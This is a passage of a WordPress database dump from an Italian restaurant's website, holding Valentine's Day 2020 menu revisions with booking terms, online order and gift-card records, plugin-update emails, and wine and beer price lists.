condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2020','','publish','open','open','','menu-di-san-valentino-2020','','','2020-01-31 12:25:06','2020-01-31 11:25:06','',0,'https://www.ristorantesolymar.it/?p=943',0,'post','',0),(944,1,'2020-01-31 12:15:53','2020-01-31 11:15:53','','solymar 14 febbraio','','inherit','open','closed','','solymar-14-febbraio','','','2020-01-31 12:15:53','2020-01-31 11:15:53','',943,'https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio.jpg',0,'attachment','image/jpeg',0),(945,1,'2020-01-31 12:16:22','2020-01-31 11:16:22','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-944\" /><em>La vita ha due doni preziosi: la bellezza e la verità. La prima l’ho trovata nel cuore di chi ama e la seconda nella mano di chi lavora.\r\n(Khalil Gibran)</em>\r\n\r\nMenù week end di San Valentino\r\nSan Valentino e Cena del 15 -2\r\n\r\n- Entrée di Benvenuto\r\n- Carpaccio di Mazzancolle nostrane, campari, arancio e kefir\r\n- Noci di Capasanta arrostita.crema di finocchio allo zenzero e salicornia\r\n- Calamaro puntarelle e Alici del Cantambrico\r\n- Tortelli di patate e burrata sl ragù di Astice e pomodorini\r\n- Rollé di Sogliola nostrana al tartufo su patata fondente\r\n&#x1f370;Cioccolato bianco lampone e liquirizia\r\n-caffè\r\n\r\n€ 55 a persona bevande escluse\r\nPrenotazione con caparra (obbligatoria )\r\nwww.ristorantesolymar.it\r\n\r\nps: 16-2 dopo 25 anni e 11 mesi di lavoro\r\nchiuderemo per lavori &#x1f49f;\r\ni dettagli i prossimi giorni\r\nOra pensiamo a festeggiare L\" Amore in tutte le sue forme (anche Amore per il proprio lavoro&#x1f64f;&#x1f64c; )\r\n\r\n\r\nModalità di prenotazione online per la cena di San Valentino 2020\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di mercoledi 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara','Menù di San Valentino 2020','','inherit','closed','closed','','943-revision-v1','','','2020-01-31 12:16:22','2020-01-31 11:16:22','',943,'https://www.ristorantesolymar.it/2020/01/31/943-revision-v1/',0,'revision','',0),(946,1,'2020-01-31 12:17:48','2020-01-31 11:17:48','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-944\" /><em>La vita ha due doni preziosi: la bellezza e la verità. La prima l’ho trovata nel cuore di chi ama e la seconda nella mano di chi lavora.\r\n(Khalil Gibran)</em>\r\n\r\nMenù week end di San Valentino\r\nSan Valentino e Cena del 15 -2\r\n\r\n- Entrée di Benvenuto\r\n- Carpaccio di Mazzancolle nostrane, campari, arancio e kefir\r\n- Noci di Capasanta arrostita.crema di finocchio allo zenzero e salicornia\r\n- Calamaro puntarelle e Alici del Cantambrico\r\n- Tortelli di patate e burrata sl ragù di Astice e pomodorini\r\n- Rollé di Sogliola nostrana al tartufo su patata fondente\r\n&#x1f370;Cioccolato bianco lampone e liquirizia\r\n-caffè\r\n\r\n€ 55 a persona bevande escluse\r\nPrenotazione con caparra (obbligatoria )\r\nwww.ristorantesolymar.it\r\n\r\nps: 16-2 dopo 25 anni e 11 mesi di lavoro\r\nchiuderemo per lavori &#x1f49f;\r\ni dettagli i prossimi giorni\r\nOra pensiamo a festeggiare L\" Amore in tutte le sue forme (anche Amore per il proprio lavoro&#x1f64f;&#x1f64c; )\r\n\r\n\r\nModalità di prenotazione online per la cena di San Valentino 2020\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di mercoledi 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2020','','inherit','closed','closed','','943-revision-v1','','','2020-01-31 12:17:48','2020-01-31 11:17:48','',943,'https://www.ristorantesolymar.it/2020/01/31/943-revision-v1/',0,'revision','',0),(947,1,'2020-01-31 12:24:51','2020-01-31 11:24:51','<em>La vita ha due doni preziosi: la bellezza e la verità. La prima l’ho trovata nel cuore di chi ama e la seconda nella mano di chi lavora.\n(Khalil Gibran)</em>\n\nMenù week end di San Valentino\nSan Valentino e Cena del 15 -2\n\n- Entrée di Benvenuto\n- Carpaccio di Mazzancolle nostrane, campari, arancio e kefir\n- Noci di Capasanta arrostita.crema di finocchio allo zenzero e salicornia\n- Calamaro puntarelle e Alici del Cantambrico\n- Tortelli di patate e burrata sl ragù di Astice e pomodorini\n- Rollé di Sogliola nostrana al tartufo su patata fondente\n- Cioccolato bianco lampone e liquirizia\n-caffè\n\n€ 55 a persona bevande escluse\nPrenotazione con caparra (obbligatoria )\nwww.ristorantesolymar.it\n\nps: 16-2 dopo 25 anni e 11 mesi di lavoro\nchiuderemo per lavori\ni dettagli i prossimi giorni\nOra pensiamo a festeggiare L\" Amore in tutte le sue forme (anche Amore per il proprio lavoro )\n\n\nModalità di prenotazione online per la cena di San Valentino 2020\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di mercoledi 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nGrazie per la comprensione\nTeo & Barbara\n\nPrenota online il tuo tavolo:\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2020','','inherit','closed','closed','','943-autosave-v1','','','2020-01-31 12:24:51','2020-01-31 11:24:51','',943,'https://www.ristorantesolymar.it/2020/01/31/943-autosave-v1/',0,'revision','',0),(948,1,'2020-01-31 12:25:06','2020-01-31 11:25:06','<em>La vita ha due doni preziosi: la bellezza e la verità. La prima l’ho trovata nel cuore di chi ama e la seconda nella mano di chi lavora.\r\n(Khalil Gibran)</em>\r\n\r\nMenù week end di San Valentino\r\nSan Valentino e Cena del 15 -2\r\n\r\n- Entrée di Benvenuto\r\n- Carpaccio di Mazzancolle nostrane, campari, arancio e kefir\r\n- Noci di Capasanta arrostita.crema di finocchio allo zenzero e salicornia\r\n- Calamaro puntarelle e Alici del Cantambrico\r\n- Tortelli di patate e burrata sl ragù di Astice e pomodorini\r\n- Rollé di Sogliola nostrana al tartufo su patata fondente\r\n- Cioccolato bianco lampone e liquirizia\r\n-caffè\r\n\r\n€ 55 a persona bevande escluse\r\nPrenotazione con caparra (obbligatoria )\r\nwww.ristorantesolymar.it\r\n\r\nps: 16-2 dopo 25 anni e 11 mesi di lavoro\r\nchiuderemo per lavori\r\ni dettagli i prossimi giorni\r\nOra pensiamo a festeggiare L\" Amore in tutte le sue forme (anche Amore per il proprio lavoro )\r\n\r\n\r\nModalità di prenotazione online per la cena di San Valentino 2020\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di mercoledi 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2020','','inherit','closed','closed','','943-revision-v1','','','2020-01-31 12:25:06','2020-01-31 11:25:06','',943,'https://www.ristorantesolymar.it/2020/01/31/943-revision-v1/',0,'revision','',0),(949,1,'2020-02-01 18:39:29','2020-02-01 17:39:29','','Order &ndash; Febbraio 1, 2020 @ 06:39 PM','','wc-processing','open','closed','wc_order_76rtgMmomeQyC','ordine-feb-01-2020-0539-pm','','','2020-02-01 18:41:01','2020-02-01 17:41:01','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=949',0,'shop_order','',3),(950,1,'2020-02-03 16:19:04','2020-02-03 15:19:04','','Order &ndash; Febbraio 3, 2020 @ 04:19 PM','','wc-processing','open','closed','wc_order_e5zeWHMZRA13k','ordine-feb-03-2020-0319-pm','','','2020-02-03 16:22:49','2020-02-03 15:22:49','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=950',0,'shop_order','',3),(951,1,'2020-02-04 22:21:45','2020-02-04 21:21:45','','Order &ndash; Febbraio 4, 2020 @ 10:21 PM','','wc-processing','open','closed','wc_order_QfJVXClDegPHs','ordine-feb-04-2020-0921-pm','','','2020-02-04 22:22:52','2020-02-04 21:22:52','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=951',0,'shop_order','',2),(952,0,'2020-02-04 22:22:54','2020-02-04 21:22:54','GIFTCARD ORDER #951','solymarcoupon4IHCG','GIFTCARD ORDER #951','publish','closed','closed','','solymarcoupon4ihcg','','','2020-02-04 22:22:54','2020-02-04 21:22:54','',0,'https://www.ristorantesolymar.it/2020/02/04/solymarcoupon4ihcg/',0,'shop_coupon','',0),(953,1,'2020-02-05 20:46:06','2020-02-05 19:46:06','','Order &ndash; Febbraio 5, 2020 @ 08:46 PM','','wc-processing','open','closed','wc_order_dg0GqL5IGyocv','ordine-feb-05-2020-0746-pm','','','2020-02-05 20:46:45','2020-02-05 19:46:45','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=953',0,'shop_order','',2),(954,1,'2020-02-06 17:21:45','2020-02-06 16:21:45','','Order &ndash; Febbraio 6, 2020 @ 05:21 PM','','wc-processing','open','closed','wc_order_Ae7yDzaicd6QI','ordine-feb-06-2020-0421-pm','','','2020-02-06 17:22:39','2020-02-06 16:22:39','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=954',0,'shop_order','',3),(955,1,'2020-02-07 11:47:37','2020-02-07 10:47:37','','Order &ndash; Febbraio 7, 2020 @ 11:47 AM','','wc-processing','open','closed','wc_order_YFfoJBhTboXNF','ordine-feb-07-2020-1047-am','','','2020-02-07 11:53:20','2020-02-07 10:53:20','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=955',0,'shop_order','',3),(956,1,'2020-02-09 11:45:30','2020-02-09 10:45:30','','Order &ndash; Febbraio 9, 2020 @ 11:45 AM','','wc-processing','open','closed','wc_order_VTDbTOnwJqVLc','ordine-feb-09-2020-1045-am','','','2020-02-09 11:46:28','2020-02-09 10:46:28','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=956',0,'shop_order','',3),(957,1,'2020-02-09 17:32:27','2020-02-09 16:32:27','','Order &ndash; Febbraio 9, 2020 @ 05:32 PM','','wc-processing','open','closed','wc_order_iV4bD6QihlbpR','ordine-feb-09-2020-0432-pm','','','2020-02-09 17:35:38','2020-02-09 16:35:38','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=957',0,'shop_order','',2),(958,1,'2020-02-10 13:26:57','2020-02-10 12:26:57','','Order &ndash; Febbraio 10, 2020 @ 01:26 PM','','wc-processing','open','closed','wc_order_YhvBJzkl06jzv','ordine-feb-10-2020-1226-pm','','','2020-02-10 13:27:58','2020-02-10 12:27:58','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=958',0,'shop_order','',2),(959,1,'2020-02-11 12:40:12','2020-02-11 11:40:12','','Order &ndash; Febbraio 11, 2020 @ 12:40 PM','','wc-cancelled','open','closed','wc_order_mgwhB2PvNiVeX','ordine-feb-11-2020-1140-am','','','2020-06-17 09:57:37','2020-06-17 07:57:37','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=959',0,'shop_order','',1),(960,1,'2020-02-11 14:52:04','2020-02-11 13:52:04','','Order &ndash; Febbraio 11, 2020 @ 02:52 PM','','wc-processing','open','closed','wc_order_qJk4x7sP0NCy3','ordine-feb-11-2020-0152-pm','','','2020-02-11 14:53:12','2020-02-11 13:53:12','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=960',0,'shop_order','',3),(961,1,'2020-02-11 17:14:45','2020-02-11 16:14:45','','Order &ndash; Febbraio 11, 2020 @ 05:14 PM','','wc-processing','open','closed','wc_order_IWp0jOAdnUQ8X','ordine-feb-11-2020-0414-pm','','','2020-02-11 17:15:17','2020-02-11 16:15:17','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=961',0,'shop_order','',3),(962,1,'2020-02-11 19:11:31','2020-02-11 18:11:31','','Order &ndash; Febbraio 11, 2020 @ 07:11 PM','','wc-processing','open','closed','wc_order_qNTF3mlVIXS7O','ordine-feb-11-2020-0611-pm','','','2020-02-11 19:13:27','2020-02-11 18:13:27','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=962',0,'shop_order','',3),(963,1,'2020-02-11 19:20:22','2020-02-11 18:20:22','','Order &ndash; Febbraio 11, 2020 @ 07:20 PM','','wc-cancelled','open','closed','wc_order_7izLNdaCcbNN7','ordine-feb-11-2020-0620-pm','','','2020-06-17 09:57:38','2020-06-17 07:57:38','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=963',0,'shop_order','',1),(965,1,'2020-02-21 11:32:38','2020-02-21 10:32:38','','Lavori in corso - Riapertura marzo 2020','','publish','closed','closed','','lavori-in-corso-riapertura-marzo-2020','','','2020-02-21 11:32:38','2020-02-21 10:32:38','',0,'https://www.ristorantesolymar.it/?post_type=popupbuilder&#038;p=965',0,'popupbuilder','',0),(966,1,'2020-02-21 11:32:01','2020-02-21 10:32:01','','LAVORI IN CORSO','','inherit','open','closed','','lavori-in-corso','','','2020-02-21 11:32:01','2020-02-21 10:32:01','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2020/02/LAVORI-IN-CORSO.jpg',0,'attachment','image/jpeg',0),(967,1,'2020-06-05 18:19:42','2020-06-05 16:19:42','','Order &ndash; June 5, 2020 @ 06:19 PM','','wc-processing','closed','closed','wc_order_fKOi3MdYotw5E','ordine-jun-05-2020-0419-pm','','','2020-06-08 23:08:25','2020-06-08 21:08:25','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=967',0,'shop_order','',3),(968,0,'2020-06-05 18:22:11','2020-06-05 16:22:11','GIFTCARD ORDER #967','solymarcouponMN9H0','GIFTCARD ORDER #967','publish','closed','closed','','solymarcouponmn9h0','','','2020-06-05 18:22:11','2020-06-05 16:22:11','',0,'https://www.ristorantesolymar.it/2020/06/05/solymarcouponmn9h0/',0,'shop_coupon','',0),(4645,0,'2021-03-23 13:27:46','2021-03-23 12:27:46','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.11 a 4.0.12)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-31','','','2021-03-23 13:27:46','2021-03-23 12:27:46','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-31/',0,'postman_sent_mail','',0),(4646,0,'2021-03-24 13:44:15','2021-03-24 12:44:15','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.12 a 4.0.13)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-32','','','2021-03-24 13:44:15','2021-03-24 12:44:15','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-32/',0,'postman_sent_mail','',0),(4647,0,'2021-03-25 14:13:17','2021-03-25 13:13:17','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.7 a 3.1.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-33','','','2021-03-25 14:13:17','2021-03-25 13:13:17','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-33/',0,'postman_sent_mail','',0),(4648,0,'2021-03-27 14:19:13','2021-03-27 13:19:13','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.8 a 3.1.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-34','','','2021-03-27 14:19:13','2021-03-27 13:19:13','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-34/',0,'postman_sent_mail','',0),(973,2,'2020-06-10 14:19:28','2020-06-10 12:19:28','<p style=\"text-align: left\"><strong>VINO DELLA CASA</strong></p>\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi        Albiano Verdicchio dei castelli di Jesi  Bott.  O, 750 l     € 10,00\r\n\r\nVallona                     Pignoletto Frizzante D.O.C. Bott.     O,750 l                      € 14,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\">LE NOSTRE PROPOSTE AL BICCHIERE</p>\r\n&nbsp;\r\n\r\n<strong>BIANCHI</strong>\r\n\r\n<strong> </strong>Marotti Campi               Albiano Verdicchio dei castelli di Jesi         “17          € 4,00\r\n\r\nKossler                            Gewurztraminer                                              “18           €5,00\r\n\r\nDomaine Hameline      Chablis                                                                               € 5,00\r\n\r\nRonco dei Tassi             Ribolla Gialla                                                                    € 5,00\r\n\r\n&nbsp;\r\n\r\n<strong>ROSATI</strong>\r\n\r\nMarotti Campi               IGT Marche ROSATO                                                    € 4,00\r\n\r\n<strong> </strong>\r\n\r\n<strong>ROSSI</strong>\r\n\r\n<strong>Per il rosso del giorno chiedere al cameriere    </strong>                                                    € 4,00','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2020-06-10 14:19:28','2020-06-10 12:19:28','',106,'https://www.ristorantesolymar.it/2020/06/10/106-revision-v1/',0,'revision','',0),(974,2,'2020-06-10 14:29:05','2020-06-10 12:29:05','LE MILLE E UNA BOLLICINA\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Italia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Valle D’Aosta</u></strong>\r\n\r\n<strong><u> </u></strong> Cave de Morgex                             Glacier Extra Brut D.O.C. Valle d’Aosta                    €30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Piemonte</u></strong>\r\n\r\n&nbsp;\r\n\r\nCoppo                                            Luigi Coppo Brut                                                               €25,00\r\n\r\nEttore Germano                          Alta Langa brut D.O.C.                                                     €30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCantine Montagna                      Pinot nero v.i.b. Oltrepò Pavese D.O.C.                         €15,00\r\n\r\nCà dei Frati                                  Rosè cuveè dei Frati metodo classico                             € 25,00\r\n\r\nCà del Vént                                Brut Rosè Pas Operè millesimo                                        € 42,00\r\n\r\nCà del Vént                                Blanc de Blancs Pas Operé millesimo                              € 60,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino - Alto Adige</u></strong>\r\n\r\n&nbsp;\r\n\r\nRevì                       Trento D.O.C. Dosaggio Zero                        € 28,00\r\n\r\nTrento D.O.C. Rosè                                         € 28,00\r\n\r\nPojer e Sandri                         Brut Rosè                                       € 30,00\r\n\r\nBalter                   Trento D.O.C. Brut Chardonnay                    € 23,00 (NO)\r\n\r\nLetrari (Talento)               Trento D.O.C. Brut                             € 25,00 (NO)\r\n\r\nTrento D.O.C. dosaggio zero riserva        € 30,00\r\n\r\nFerrari                                  Perlè Trento D.O.C Brut                     € 40,00\r\n\r\nGiulio Ferrari                Riserva del fondatore Trento D.O.C. Extra Brut         € 85,00\r\n\r\nPedrotti                         Trento D.O.C. Brut Millesimato               € 30,00\r\n\r\nTrento D.O.C. Bouquet Brut Nature        € 27,00\r\n\r\nTrento D.O.C. Brut Riserva 12 anni         € 70,00\r\n\r\nCantina Furlani                  Furlani Brut                                             € 21,00\r\n\r\nCantina Furlani                  Furlani Brut Nature                                € 22,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Veneto</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nAdami                      Prosecco Valdob. D.O.C.G. Brut Bosco di Giga            € 17,00\r\n\r\nCartizze Valdobbiadene superiore D.O.C.G.                  € 25,00\r\n\r\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','73-revision-v1','','','2020-06-10 14:29:05','2020-06-10 12:29:05','',73,'https://www.ristorantesolymar.it/2020/06/10/73-revision-v1/',0,'revision','',0),(975,2,'2020-10-24 23:00:55','2020-10-24 21:00:55','<u>     SOL Y MAR</u>\n<p style=\"text-align: center\"><strong><u>Birre speciali</u></strong></p>\n&nbsp;\n<p style=\"text-align: center\"><strong>Birra Amarcord</strong></p>\n&nbsp;\n<p style=\"text-align: left\">       Gradisca              Lager Chiara                                                                                  €   7,00</p>\n<p style=\"text-align: left\">       Midòna                Golden Ale                                                                                     €   7,0o</p>\n<p style=\"text-align: left\"></p>\n<p style=\"text-align: center\"><strong>Ichnusa</strong><strong> </strong></p>\n<p style=\"text-align: left\">       Cruda                Chiara (sapore secco e beverino) 0,33 l 4,9%                   (no)         €  3,00</p>\n<p style=\"text-align: left\"></p>\n<p style=\"text-align: center\"><strong>32 via dei birrai</strong></p>\n<p style=\"text-align: left\">       Curmi al farro  (beverina, rinfrescante, lievemente acidula, di medio corpo) 0,750 l 5,8%       € 11,50</p>\n<p style=\"text-align: left\"></p>\n<p style=\"text-align: center\"><strong>Birra Perugia</strong></p>\n<p style=\"text-align: left\"><strong> </strong></p>\n<p style=\"text-align: left\"><strong>     </strong> Golden ale       Chiara (beverina,profumi freschi e vivaci) 0,330 l 5,2%                                       €  6,00</p>\n<p style=\"text-align: left\">       Golden ale         Chiara (beverina,profumi freschi e vivaci) 0,750 l 5,2%                                      € 11,50</p>\n&nbsp;\n\n&nbsp;\n<pre></pre>','Birre','','inherit','closed','closed','','69-autosave-v1','','','2020-10-24 23:00:55','2020-10-24 21:00:55','',69,'https://www.ristorantesolymar.it/2020/06/10/69-autosave-v1/',0,'revision','',0),(976,2,'2020-06-10 14:37:11','2020-06-10 12:37:11','<u>     SOL Y MAR</u>\r\n\r\n<strong><u>Birre speciali</u></strong>\r\n\r\n<strong>   </strong><strong> Ichnusa</strong>\r\n\r\n<strong> </strong>\r\n\r\nCruda                Chiara (sapore secco e beverino) 0,33 l 4,9%                                          €  3,00\r\n\r\n<strong> </strong>\r\n\r\n<strong>     32 via dei birrai</strong>\r\n\r\n<strong> </strong>\r\n\r\nCurmi al farro  (beverina, rinfrescante, lievemente acidula, di medio corpo) 0,750 l 5,8% € 11,50\r\n\r\nOppale ale         (corposa, luppolata, note di caramello) 0,750 l 5,5%               € 11,50\r\n\r\n&nbsp;\r\n\r\n<strong>      Birra Perugia</strong>\r\n\r\nBirra calibro 7 Chiara (dai forti richiami agrumati e tropicali) 0,330 l 5,5%       €  6,00\r\n\r\nGolden ale       Chiara (beverina,profumi freschi e vivaci) 0,330 l 5,2%                €  6,00\r\n\r\nGolden ale         Chiara (beverina,profumi freschi e vivaci) 0,750 l 5,2%               € 11,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>   </strong><u></u>\r\n\r\n<strong> </strong>\r\n\r\n<strong>      </strong>\r\n\r\n&nbsp;\r\n<pre></pre>','Birre','','inherit','closed','closed','','69-revision-v1','','','2020-06-10 14:37:11','2020-06-10 12:37:11','',69,'https://www.ristorantesolymar.it/2020/06/10/69-revision-v1/',0,'revision','',0),(977,2,'2020-06-10 14:40:08','2020-06-10 12:40:08','<u>            SOL Y MAR</u>\r\n\r\n<u> </u>\r\n\r\n<strong><u>I PICCOLI FORMATI DA 0,375 </u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n<ol>\r\n 	<li><u> 0,375</u></li>\r\n</ol>\r\n<u> </u>\r\n\r\n<strong>Fermi</strong>\r\n\r\n<strong> </strong>\r\n\r\nSan Patrignano              Aulente Bianco                                                             € 9,00\r\n\r\nDonnafugata                    Anthilia I.G.T.                                                                € 9,00\r\n\r\nUmani Ronchi             Verdicchio Casal Di Serra                                 € 9,00\r\n\r\n&nbsp;\r\n\r\n<strong>       </strong>\r\n\r\n<strong>Frizzanti</strong>\r\n\r\n<strong> </strong>\r\n\r\nAdami                              Prosecco D.O.C.                                                               € 10,00\r\n\r\nIl Mosnel                          Franciacorta Brut D.O.C.G.                                          € 16,00\r\n\r\nLaherte Freres             Champagne Brut Tradition                                         € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Rossi</strong>\r\n\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Rosso                                                                   € 9,00','I PICCOLI FORMATI DA 0,375','','publish','closed','closed','','i-piccoli-formati-da-0375','','','2020-06-10 14:40:08','2020-06-10 12:40:08','',0,'https://www.ristorantesolymar.it/?page_id=977',0,'page','',0),(978,2,'2020-06-10 14:40:08','2020-06-10 12:40:08','<u>            SOL Y MAR</u>\r\n\r\n<u> </u>\r\n\r\n<strong><u>I PICCOLI FORMATI DA 0,375 </u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n<ol>\r\n 	<li><u> 0,375</u></li>\r\n</ol>\r\n<u> </u>\r\n\r\n<strong>Fermi</strong>\r\n\r\n<strong> </strong>\r\n\r\nSan Patrignano              Aulente Bianco                                                             € 9,00\r\n\r\nDonnafugata                    Anthilia I.G.T.                                                                € 9,00\r\n\r\nUmani Ronchi             Verdicchio Casal Di Serra                                 € 